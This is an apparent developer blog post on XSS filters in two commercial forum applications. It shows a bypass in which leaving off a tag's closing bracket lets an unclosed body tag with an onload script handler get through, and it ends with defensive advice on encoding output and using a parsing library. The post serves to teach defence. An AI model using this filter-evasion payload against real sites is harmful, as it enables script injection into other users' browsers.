In the last couple of days I’ve tested the effectiveness of XSS filters in two different commercial forum applications, both advertised as being able to filter out malicious scripts. Neither were effectively protected against this:
Agh! All I did was remove the tag’s closing “>” character and neither app recognised it as HTML. The latest versions of Firefox and Internet Explorer both “gracefully” interpret the malformed tag, loading and running the malicious script.
If I didn’t want to load my JS from an external file (to help hide my identity), or if they were specifically preventing the string “<script“, I could have written this:
<body onload="alert('I am evil script'); doEvilStuff();"
Browsers don’t care if you add multiple body tags. They’ll run the “onload” code for all of them.
One of the applications was supposed to filter out all HTML, full stop. Putting images in this supposed plain text was, of course, easy – just miss off the closing bracket of the <IMG> tag.
Rolling your own HTML filter
HTML filtering is hard to get right, because HTML is so permissive. Even the big webmail services occasionally admit that someone’s found a new loophole in their system.
If you can get away with simply HTML-encoding *all* user input at the point of display, do that – it’s easy and very safe, like this:
MyLabel.Text = HttpUtility.HtmlEncode(suspiciousString);
If you have a functional requirement to allow certain HTML tags, you’re going to have to consider the multitude of ways that someone can hide script in HTML.
If you’re writing .NET to parse and reformulate possibly-malformed HTML, I strongly recommend the HTML Agility Pack. It’s a Microsoft-hosted open source project that makes it a breeze to extract plain text – or whitelisted markup – from any string claiming to be HTML.
Don’t rely on some regular expression you cooked up yourself in 10 minutes. You won’t get it right.